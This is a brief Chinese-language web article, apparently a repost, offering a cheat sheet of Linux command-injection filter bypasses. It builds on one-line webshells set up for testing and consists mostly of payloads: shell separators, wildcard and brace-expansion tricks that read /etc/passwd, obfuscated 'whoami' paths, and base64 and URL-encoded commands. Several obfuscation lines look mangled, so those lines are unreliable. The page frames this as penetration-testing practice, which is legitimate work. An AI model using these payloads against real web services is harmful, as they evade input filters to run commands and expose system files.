

部署服務器端為Linux系統的http服務,留存get和post方式的一句話木馬,用于命令執行測試。(測試思路可以對話Chatgpt)
linux邏輯運算符
; //分號
| //僅執行后面那條命令
|| //僅執行前面那條命令
& //兩條命令都會執行
%0a //換行符 %0d //回車符
利用通配符
通配符"?"代表任意一個字符,"*"代表任意個字符
cat%20/etc/pa??wd
cat%20/etc/pa?*wd
嘗試
cat /*****et*c*/*pas**************************************************swd
結合上述方式進行組合bypass
echo mt ; whoami
使用大括號來繞過空格的限制
{cat,/etc/passwd}
{ls,-alth}
命令混淆
whoami
1oami
@ami *mi
命令變形
/*/bin/wh*mi
/us*/*in/who*mi
/*s?/*?n/w?o*i
base64編碼方式進行
echo id|base64
echo id|base64
URL編碼
%28%22%65%5c%63%68%6f%20%5c%69%5c%64%7c%62%61%73%65%36%34%22%29%3b
審核編輯 :李倩
-
Linux
+關注
關注
87文章
11465瀏覽量
212826 -
服務器
+關注
關注
13文章
9702瀏覽量
87317 -
邏輯運算
+關注
關注
0文章
57瀏覽量
9929
原文標題:Linux命令執行Bypass常見姿勢
文章出處:【微信號:哆啦安全,微信公眾號:哆啦安全】歡迎添加關注!文章轉載請注明出處。
發布評論請先 登錄
嵌入式Linux開發教程:Linux常見命令(上篇)

評論